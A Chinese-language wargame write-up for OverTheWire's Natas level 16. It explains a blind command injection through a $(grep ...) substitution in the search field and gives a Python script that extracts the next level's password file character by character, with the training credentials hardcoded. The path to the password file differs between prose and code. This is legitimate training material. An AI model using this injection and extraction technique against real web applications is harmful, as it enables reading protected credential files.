natas16 题解

本题与上一题相似（可看我上篇文章nata15 题解）

进入后发现和早前某关像，执行一个grep命令查找，这里的过滤字符中恰恰没包括 $ . * 这三个，可以利用$(grep -E ^8.* /etc/natas_webpasswd/natas17)hello 这样去输入

如果返回了hello和其他的字串，说明这里的grep没有执行，-E 是执行一个正则表达式，^8,* 这个表达式的意思是以8开头（这里就是上题的思路了），每次试出一个后附加上去然后继续试下一个，下一个加在原来的末尾，下面用python3实现，requests库比较好用，容易理解

import requests
url = "http://natas16.natas.labs.overthewire.org/"
username = "natas16"
password= 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh'
au = requests.auth.HTTPBasicAuth(username,password)
ans=""
testCharacter="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
i=0
while i < len(testCharacter):
#print(url1+key+url2)
    payload={'needle':'$(grep -E ^'+ans+testCharacter[i]+'.* /etc/natas_webpass/natas17)hello','submit':'Search'}
    req = requests.get(url,auth=au,params=payload)
    if 'hello' not in req.text:
        ans+=testCharacter[i]
        print(ans)
        i=0
        continue
    i+=1